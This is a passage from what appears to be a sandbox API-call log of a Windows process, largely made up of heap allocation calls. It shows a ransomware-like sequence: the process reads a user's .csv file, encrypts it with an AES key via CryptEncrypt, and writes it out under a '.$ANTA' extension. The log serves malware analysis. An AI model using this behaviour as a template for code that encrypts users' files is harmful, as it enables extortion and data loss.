| out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.991] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0082.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0082.991] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.991] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\kdeophxr4d.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.991] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.992] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.992] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0082.992] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ecda0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.993] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0082.993] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\kdeophxr4d.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.996] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0082.996] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x10000, lpOverlapped=0x0) returned 1 [0082.998] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xd72, lpOverlapped=0x0) returned 1 [0082.998] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0083.002] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0083.003] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0083.003] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0083.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0083.003] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2c00, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c00*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0083.003] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.003] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.003] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.005] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x10d72, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x10d80) returned 1 [0083.005] CharLowerBuffW (in: lpsz="byte[68993]", cchLength=0xb | out: lpsz="byte[68993]") returned 0xb [0083.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.005] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49dc890*, pdwDataLen=0x144de30*=0x10d72, dwBufLen=0x10d80 | out: pbData=0x49dc890*, pdwDataLen=0x144de30*=0x10d80) returned 1 [0083.005] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.006] WriteFile (in: hFile=0x298, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x10d80, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144e834*=0x10d80, lpOverlapped=0x0) returned 1 [0083.008] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0083.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2dc0 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2df0 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0083.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0083.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c3878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0083.009] CryptDestroyKey (hKey=0x41ac000) returned 1 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0083.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.009] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.029] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0083.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e80 [0083.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2da0 [0083.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0083.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0083.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0083.029] CryptReleaseContext (hProv=0x41a4a58, dwFlags=0x0) returned 1 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3848 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0083.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0083.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0083.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.032] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0083.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0083.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3818 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0083.032] PeekMessageW (in: lpMsg=0x144e2f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e2f4) returned 0 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0083.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.033] FreeLibrary (hLibModule=0x756e0000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0083.033] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0083.033] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 